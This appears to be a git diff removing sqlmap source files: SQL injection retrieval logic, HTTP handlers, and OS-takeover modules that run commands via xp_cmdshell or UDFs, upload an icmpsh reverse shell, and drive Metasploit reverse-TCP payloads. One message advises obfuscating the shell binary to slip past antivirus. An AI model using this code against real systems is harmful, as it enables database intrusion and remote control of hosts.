fallback: - warnMsg = "something went wrong with full UNION " - warnMsg += "technique (could be because of " - warnMsg += "limitation on retrieved number of entries)" - if " FROM " in query.upper(): - warnMsg += ". Falling back to partial UNION technique" - singleTimeWarnMessage(warnMsg) - - try: - pushValue(kb.forcePartialUnion) - kb.forcePartialUnion = True - value = _goUnion(query, unpack, dump) - found = (value is not None) or (value is None and expectingNone) - finally: - kb.forcePartialUnion = popValue() - else: - singleTimeWarnMessage(warnMsg) - - if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: - kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY - value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) - count += 1 - found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - - if found and conf.dnsName: - _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) - warnMsg = "option '--dns-domain' will be ignored " - warnMsg += "as faster techniques are usable " - warnMsg += "(%s) " % _ - singleTimeWarnMessage(warnMsg) - - if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: - kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN - - if expected == EXPECTED.BOOL: - value = _goBooleanProxy(booleanExpression) - else: - value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - - count += 1 - found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - - if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: - kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", expression)) if re.search(r"(?i)SELECT.+FROM", expression) else None - - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): - kb.technique = PAYLOAD.TECHNIQUE.TIME - else: - kb.technique = PAYLOAD.TECHNIQUE.STACKED - - if expected == EXPECTED.BOOL: - value = _goBooleanProxy(booleanExpression) - else: - value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - else: - errMsg = "none of the injection types identified can be " - errMsg += "leveraged to retrieve queries output" - raise SqlmapNotVulnerableException(errMsg) - - finally: - kb.resumeValues = True - kb.responseTimeMode = None - - conf.tbl = popValue() - conf.db = popValue() - - if suppressOutput is not None: - getCurrentThreadData().disableStdOut = popValue() - - kb.safeCharEncode = False - - if not any((kb.testMode, conf.dummy, conf.offline)) and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert: - warnMsg = "in case of continuous data retrieval problems you are advised to try " - warnMsg += "a switch '--no-cast' " - warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else "" - singleTimeWarnMessage(warnMsg) - - return extractExpectedValue(value, expected) - -def goStacked(expression, silent=False): - if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: - kb.technique = PAYLOAD.TECHNIQUE.STACKED - else: - for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): - _ = getTechniqueData(technique) - if _ and "stacked" in _["title"].lower(): - kb.technique = technique - break - - expression = cleanQuery(expression) - - if conf.direct: - return direct(expression) - - query = agent.prefixQuery(";%s" % expression) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper()) - -def checkBooleanExpression(expression, expectingNone=True): - return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone) diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py deleted file mode 100644 index 8e9d17d1..00000000 --- a/lib/request/methodrequest.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import urllib2 - -class MethodRequest(urllib2.Request): - """ - Used to create HEAD/PUT/DELETE/... requests with urllib2 - """ - - def set_method(self, method): - self.method = method.upper() - - def get_method(self): - return getattr(self, 'method', urllib2.Request.get_method(self)) diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py deleted file mode 100644 index eeaa862b..00000000 --- a/lib/request/pkihandler.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import urllib2 - -from lib.core.data import conf - -class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): - def __init__(self, auth_file): - urllib2.HTTPSHandler.__init__(self) - self.auth_file = auth_file - - def https_open(self, req): - return self.do_open(self.getConnection, req) - - def getConnection(self, host, timeout=None): - # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain - return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py deleted file mode 100644 index e4171031..00000000 --- a/lib/request/rangehandler.py +++ /dev/null @@ -1,50 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import urllib -import urllib2 - -from lib.core.exception import SqlmapConnectionException - -class HTTPRangeHandler(urllib2.BaseHandler): - """ - Handler that enables HTTP Range headers. - - Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file - - This was extremely simple. The Range header is a HTTP feature to - begin with so all this class does is tell urllib2 that the - "206 Partial Content" response from the HTTP server is what we - expected. - - Example: - import urllib2 - import byterange - - range_handler = range.HTTPRangeHandler() - opener = urllib2.build_opener(range_handler) - - # install it - urllib2.install_opener(opener) - - # create Request and set Range header - req = urllib2.Request('http://www.python.org/') - req.header['Range'] = 'bytes=30-50' - f = urllib2.urlopen(req) - """ - - def http_error_206(self, req, fp, code, msg, hdrs): - # 206 Partial Content Response - r = urllib.addinfourl(fp, hdrs, req.get_full_url()) - r.code = code - r.msg = msg - return r - - def http_error_416(self, req, fp, code, msg, hdrs): - # HTTP's Range Not Satisfiable error - errMsg = "Invalid range" - raise SqlmapConnectionException(errMsg) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py deleted file mode 100644 index 3eba5260..00000000 --- a/lib/request/redirecthandler.py +++ /dev/null @@ -1,169 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import types -import urllib2 -import urlparse - -from StringIO import StringIO - -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.common import getHostHeader -from lib.core.common import getUnicode -from lib.core.common import logHTTPTraffic -from lib.core.common import readInput -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import REDIRECTION -from lib.core.exception import SqlmapConnectionException -from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE -from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS -from lib.core.settings import MAX_TOTAL_REDIRECTIONS -from lib.core.threads import getCurrentThreadData -from lib.request.basic import decodePage -from lib.request.basic import parseResponse - -class SmartRedirectHandler(urllib2.HTTPRedirectHandler): - def _get_header_redirect(self, headers): - retVal = None - - if headers: - if "location" in headers: - retVal = headers.getheaders("location")[0] - elif "uri" in headers: - retVal = headers.getheaders("uri")[0] - - return retVal - - def _ask_redirect_choice(self, redcode, redurl, method): - with kb.locks.redirect: - if kb.redirectChoice is None: - msg = "sqlmap got a %d redirect to " % redcode - msg += "'%s'. Do you want to follow? [Y/n] " % redurl - choice = readInput(msg, default="Y") - - kb.redirectChoice = choice.upper() - - if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: - msg = "redirect is a result of a " - msg += "POST request. Do you want to " - msg += "resend original POST data to a new " - msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N") - choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) - - kb.resendPostOnRedirect = choice.upper() == 'Y' - - if kb.resendPostOnRedirect: - self.redirect_request = self._redirect_request - - def _redirect_request(self, req, fp, code, msg, headers, newurl): - newurl = newurl.replace(' ', '%20') - return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host()) - - def http_error_302(self, req, fp, code, msg, headers): - content = None - redurl = self._get_header_redirect(headers) - - try: - content = fp.read(MAX_CONNECTION_TOTAL_SIZE) - except Exception, msg: - dbgMsg = "there was a problem while retrieving " - dbgMsg += "redirect response content (%s)" % msg - logger.debug(dbgMsg) - finally: - if content: - try: # try to write it back to the read buffer so we could reuse it in further steps - fp.fp._rbuf.truncate(0) - fp.fp._rbuf.write(content) - except: - pass - - content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE)) - - threadData = getCurrentThreadData() - threadData.lastRedirectMsg = (threadData.lastRequestUID, content) - - redirectMsg = "HTTP redirect " - redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg)) - - if headers: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items()) - else: - logHeaders = "" - - redirectMsg += logHeaders - if content: - redirectMsg += "\n\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE]) - - logHTTPTraffic(threadData.lastRequestMsg, redirectMsg) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg) - - if redurl: - try: - if not urlparse.urlsplit(redurl).netloc: - redurl = urlparse.urljoin(req.get_full_url(), redurl) - - self._infinite_loop_check(req) - self._ask_redirect_choice(code, redurl, req.get_method()) - except ValueError: - redurl = None - result = fp - - if redurl and kb.redirectChoice == REDIRECTION.YES: - parseResponse(content, headers) - - req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) - if headers and HTTP_HEADER.SET_COOKIE in headers: - req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] - try: - result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) - except urllib2.HTTPError, e: - result = e - - # Dirty hack for http://bugs.python.org/issue15701 - try: - result.info() - except AttributeError: - def _(self): - return getattr(self, "hdrs") or {} - result.info = types.MethodType(_, result) - - if not hasattr(result, "read"): - def _(self, length=None): - return e.msg - result.read = types.MethodType(_, result) - - if not getattr(result, "url", None): - result.url = redurl - - if not getattr(result, "code", None): - result.code = 999 - except: - redurl = None - result = fp - fp.read = StringIO("").read - else: - result = fp - - threadData.lastRedirectURL = (threadData.lastRequestUID, redurl) - - result.redcode = code - result.redurl = redurl - return result - - http_error_301 = http_error_303 = http_error_307 = http_error_302 - - def _infinite_loop_check(self, req): - if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): - errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) - errMsg += "Please check all provided parameters and/or provide missing ones" - raise SqlmapConnectionException(errMsg) diff --git a/lib/request/templates.py b/lib/request/templates.py deleted file mode 100644 index 2cda182f..00000000 --- a/lib/request/templates.py +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import kb -from lib.request.connect import Connect as Request - -def getPageTemplate(payload, place): - retVal = (kb.originalPage, kb.errorIsNone) - - if payload and place: - if (payload, place) not in kb.pageTemplates: - page, _ = Request.queryPage(payload, place, content=True, raise404=False) - kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) - - retVal = kb.pageTemplates[(payload, place)] - - return retVal - diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/takeover/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py deleted file mode 100644 index fcfd1f34..00000000 --- a/lib/takeover/abstraction.py +++ /dev/null @@ -1,216 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sys - -from extra.safe2bin.safe2bin import safechardecode -from lib.core.common import dataToStdout -from lib.core.common import Backend -from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import isStackingAvailable -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.shell import autoCompletion -from lib.request import inject -from lib.takeover.udf import UDF -from lib.takeover.web import Web -from lib.takeover.xp_cmdshell import Xp_cmdshell - - -class Abstraction(Web, UDF, Xp_cmdshell): - """ - This class defines an abstraction layer for OS takeover functionalities - to UDF / Xp_cmdshell objects - """ - - def __init__(self): - self.envInitialized = False - self.alwaysRetrieveCmdOutput = False - - UDF.__init__(self) - Web.__init__(self) - Xp_cmdshell.__init__(self) - - def execCmd(self, cmd, silent=False): - if self.webBackdoorUrl and not isStackingAvailable(): - self.webBackdoorRunCmd(cmd) - - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.udfExecCmd(cmd, silent=silent) - - elif Backend.isDbms(DBMS.MSSQL): - self.xpCmdshellExecCmd(cmd, silent=silent) - - else: - errMsg = "Feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - def evalCmd(self, cmd, first=None, last=None): - retVal = None - - if self.webBackdoorUrl and not isStackingAvailable(): - retVal = self.webBackdoorRunCmd(cmd) - - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - retVal = self.udfEvalCmd(cmd, first, last) - - elif Backend.isDbms(DBMS.MSSQL): - retVal = self.xpCmdshellEvalCmd(cmd, first, last) - - else: - errMsg = "Feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - return safechardecode(retVal) - - def runCmd(self, cmd): - getOutput = None - - if not self.alwaysRetrieveCmdOutput: - message = "do you want to retrieve the command standard " - message += "output? [Y/n/a] " - getOutput = readInput(message, default="Y") - - if getOutput in ("a", "A"): - self.alwaysRetrieveCmdOutput = True - - if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput: - output = self.evalCmd(cmd) - - if output: - conf.dumper.string("command standard output", output) - else: - dataToStdout("No output\n") - else: - self.execCmd(cmd) - - def shell(self): - if self.webBackdoorUrl and not isStackingAvailable(): - infoMsg = "calling OS shell. To quit type " - infoMsg += "'x' or 'q' and press ENTER" - logger.info(infoMsg) - - else: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - infoMsg = "going to use injected sys_eval and sys_exec " - infoMsg += "user-defined functions for operating system " - infoMsg += "command execution" - logger.info(infoMsg) - - elif Backend.isDbms(DBMS.MSSQL): - infoMsg = "going to use xp_cmdshell extended procedure for " - infoMsg += "operating system command execution" - logger.info(infoMsg) - - else: - errMsg = "feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") - infoMsg += "'x' or 'q' and press ENTER" - logger.info(infoMsg) - - autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX) - - while True: - command = None - - try: - command = raw_input("os-shell> ") - command = getUnicode(command, encoding=sys.stdin.encoding) - except KeyboardInterrupt: - print - errMsg = "user aborted" - logger.error(errMsg) - except EOFError: - print - errMsg = "exit" - logger.error(errMsg) - break - - if not command: - continue - - if command.lower() in ("x", "q", "exit", "quit"): - break - - self.runCmd(command) - - def _initRunAs(self): - if not conf.dbmsCred: - return - - if not conf.direct and not isStackingAvailable(): - errMsg = "stacked queries are not supported hence sqlmap cannot " - errMsg += "execute statements as another user. The execution " - errMsg += "will continue and the DBMS credentials provided " - errMsg += "will simply be ignored" - logger.error(errMsg) - - return - - if Backend.isDbms(DBMS.MSSQL): - msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function " - msg += "is disabled by default. This function is needed to execute " - msg += "statements as another DBMS user since you provided the " - msg += "option '--dbms-creds'. If you are DBA, you can enable it. " - msg += "Do you want to enable it? [Y/n] " - choice = readInput(msg, default="Y") - - if not choice or choice in ("y", "Y"): - expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") - inject.goStacked(expression) - - # TODO: add support for PostgreSQL - #elif Backend.isDbms(DBMS.PGSQL): - # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") - # inject.goStacked(expression) - - def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): - self._initRunAs() - - if self.envInitialized and not forceInit: - return - - if web: - self.webInit() - else: - self.checkDbmsOs(detailed) - - if mandatory and not self.isDba(): - warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" - - if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): - warnMsg += ". You can try to use option '--dbms-cred' " - warnMsg += "to execute statements as a DBA user if you " - warnMsg += "were able to extract and crack a DBA " - warnMsg += "password by any mean" - - logger.warn(warnMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - success = self.udfInjectSys() - - if success is not True: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - elif Backend.isDbms(DBMS.MSSQL): - if mandatory: - self.xpCmdshellInit() - else: - errMsg = "feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - self.envInitialized = True diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py deleted file mode 100644 index babfcc1a..00000000 --- a/lib/takeover/icmpsh.py +++ /dev/null @@ -1,124 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import time - -from extra.icmpsh.icmpsh_m import main as icmpshmaster -from lib.core.common import getLocalIP -from lib.core.common import getRemoteIP -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import paths -from lib.core.exception import SqlmapDataException - -class ICMPsh: - """ - This class defines methods to call icmpsh for plugins. - """ - - def _initVars(self): - self.lhostStr = None - self.rhostStr = None - self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() or conf.hostname - self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_")) - - def _selectRhost(self): - address = None - message = "what is the back-end DBMS address? " - - if self.remoteIP: - message += "[Enter for '%s' (detected)] " % self.remoteIP - - while not address: - address = readInput(message, default=self.remoteIP) - - if conf.batch and not address: - raise SqlmapDataException("remote host address is missing") - - return address - - def _selectLhost(self): - address = None - message = "what is the local address? " - - if self.localIP: - message += "[Enter for '%s' (detected)] " % self.localIP - - while not address: - address = readInput(message, default=self.localIP) - - if conf.batch and not address: - raise SqlmapDataException("local host address is missing") - - return address - - def _prepareIngredients(self, encode=True): - self.lhostStr = ICMPsh._selectLhost(self) - self.rhostStr = ICMPsh._selectRhost(self) - - def _runIcmpshMaster(self): - infoMsg = "running icmpsh master locally" - logger.info(infoMsg) - - icmpshmaster(self.lhostStr, self.rhostStr) - - def _runIcmpshSlaveRemote(self): - infoMsg = "running icmpsh slave remotely" - logger.info(infoMsg) - - cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self._icmpslaveRemote, self.lhostStr) - - self.execCmd(cmd, silent=True) - - def uploadIcmpshSlave(self, web=False): - ICMPsh._initVars(self) - self._randStr = randomStr(lowercase=True) - self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr - - self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) - self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote)) - - logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote) - - if web: - written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave) - else: - written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True) - - if written is not True: - errMsg = "there has been a problem uploading icmpsh, it " - errMsg += "looks like the binary file has not been written " - errMsg += "on the database underlying file system or an AV has " - errMsg += "flagged it as malicious and removed it. In such a case " - errMsg += "it is recommended to recompile icmpsh with slight " - errMsg += "modification to the source code or pack it with an " - errMsg += "obfuscator software" - logger.error(errMsg) - - return False - else: - logger.info("icmpsh successfully uploaded") - return True - - def icmpPwn(self): - ICMPsh._prepareIngredients(self) - self._runIcmpshSlaveRemote() - self._runIcmpshMaster() - - debugMsg = "icmpsh master exited" - logger.debug(debugMsg) - - time.sleep(1) - self.execCmd("taskkill /F /IM %s" % self._icmpslaveRemoteBase, silent=True) - time.sleep(1) - self.delRemoteFile(self._icmpslaveRemote) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py deleted file mode 100644 index 84540583..00000000 --- a/lib/takeover/metasploit.py +++ /dev/null @@ -1,729 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import sys -import tempfile -import time - -from subprocess import PIPE - -from extra.cloak.cloak import cloak -from extra.cloak.cloak import decloak -from lib.core.common import dataToStdout -from lib.core.common import Backend -from lib.core.common import getLocalIP -from lib.core.common import getRemoteIP -from lib.core.common import getUnicode -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import pollProcess -from lib.core.common import randomRange -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapGenericException -from lib.core.settings import IS_WIN -from lib.core.settings import METASPLOIT_SESSION_TIMEOUT -from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER -from lib.core.settings import UNICODE_ENCODING -from lib.core.subprocessng import blockingReadFromFD -from lib.core.subprocessng import blockingWriteToFD -from lib.core.subprocessng import Popen as execute -from lib.core.subprocessng import send_all -from lib.core.subprocessng import recv_some - -if IS_WIN: - import msvcrt -else: - from select import select - -class Metasploit: - """ - This class defines methods to call Metasploit for plugins. - """ - - def _initVars(self): - self.connectionStr = None - self.lhostStr = None - self.rhostStr = None - self.portStr = None - self.payloadStr = None - self.encoderStr = None - self.payloadConnStr = None - self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() or conf.hostname - self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) - self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole")) - self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) - self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) - self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom")) - - if IS_WIN: - _ = conf.msfPath - while _: - if os.path.exists(os.path.join(_, "scripts")): - _ = os.path.join(_, "scripts", "setenv.bat") - break - else: - old = _ - _ = normalizePath(os.path.join(_, "..")) - if _ == old: - break - self._msfCli = "%s & ruby %s" % (_, self._msfCli) - self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) - self._msfEncode = "ruby %s" % self._msfEncode - self._msfPayload = "%s & ruby %s" % (_, self._msfPayload) - self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) - - self._msfPayloadsList = { - "windows": { - 1: ("Meterpreter (default)", "windows/meterpreter"), - 2: ("Shell", "windows/shell"), - 3: ("VNC", "windows/vncinject"), - }, - "linux": { - 1: ("Shell (default)", "linux/x86/shell"), - 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), - } - } - - self._msfConnectionsList = { - "windows": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), - 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), - 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), - 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - }, - "linux": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - } - } - - self._msfEncodersList = { - "windows": { - 1: ("No Encoder", "generic/none"), - 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), - 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), - 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), - 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), - 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), - 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), - 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), - 9: ("Non-Alpha Encoder", "x86/nonalpha"), - 10: ("Non-Upper Encoder", "x86/nonupper"), - 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), - 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), - 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), - } - } - - self._msfSMBPortsList = { - "windows": { - 1: ("139/TCP", "139"), - 2: ("445/TCP (default)", "445"), - } - } - - self._portData = { - "bind": "remote port number", - "reverse": "local port number", - } - - def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): - if Backend.isOs(OS.WINDOWS): - opSys = "windows" - else: - opSys = "linux" - - message = "which %s do you want to use?" % msg - - if lst: - for num, data in lst[opSys].items(): - description = data[0] - - if num > maxValue: - maxValue = num - - if "(default)" in description: - default = num - - message += "\n[%d] %s" % (num, description) - else: - message += " [%d] " % default - - choice = readInput(message, default="%d" % default) - - if not choice: - if lst: - choice = getUnicode(default, UNICODE_ENCODING) - else: - return default - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - return self._skeletonSelection(msg, lst, maxValue, default) - - elif int(choice) > maxValue or int(choice) < 1: - logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) - return self._skeletonSelection(msg, lst, maxValue, default) - - choice = int(choice) - - if lst: - choice = lst[opSys][choice][1] - - return choice - - def _selectSMBPort(self): - return self._skeletonSelection("SMB port", self._msfSMBPortsList) - - def _selectEncoder(self, encode=True): - # This is always the case except for --os-bof where the user can - # choose which encoder to use. When called from --os-pwn the encoder - # is always x86/alpha_mixed - used for sys_bineval() and - # shellcodeexec - if isinstance(encode, basestring): - return encode - - elif encode: - return self._skeletonSelection("payload encoding", self._msfEncodersList) - - def _selectPayload(self): - if Backend.isOs(OS.WINDOWS) and conf.privEsc: - infoMsg = "forcing Metasploit payload to Meterpreter because " - infoMsg += "it is the only payload that can be used to " - infoMsg += "escalate privileges via 'incognito' extension, " - infoMsg += "'getsystem' command or post modules" - logger.info(infoMsg) - - _payloadStr = "windows/meterpreter" - else: - _payloadStr = self._skeletonSelection("payload", self._msfPayloadsList) - - if _payloadStr == "windows/vncinject": - choose = False - - if Backend.isDbms(DBMS.MYSQL): - debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, it is likely that the the VNC " - debugMsg += "injection will be successful" - logger.debug(debugMsg) - - elif Backend.isDbms(DBMS.PGSQL): - choose = True - - warnMsg = "by default PostgreSQL on Windows runs as " - warnMsg += "postgres user, it is unlikely that the VNC " - warnMsg += "injection will be successful" - logger.warn(warnMsg) - - elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - choose = True - - warnMsg = "it is unlikely that the VNC injection will be " - warnMsg += "successful because usually Microsoft SQL Server " - warnMsg += "%s runs as Network Service " % Backend.getVersion() - warnMsg += "or the Administrator is not logged in" - logger.warn(warnMsg) - - if choose: - message = "what do you want to do?\n" - message += "[1] Give it a try anyway\n" - message += "[2] Fall back to Meterpreter payload (default)\n" - message += "[3] Fall back to Shell payload" - - while True: - choice = readInput(message, default="2") - - if not choice or choice == "2": - _payloadStr = "windows/meterpreter" - - break - 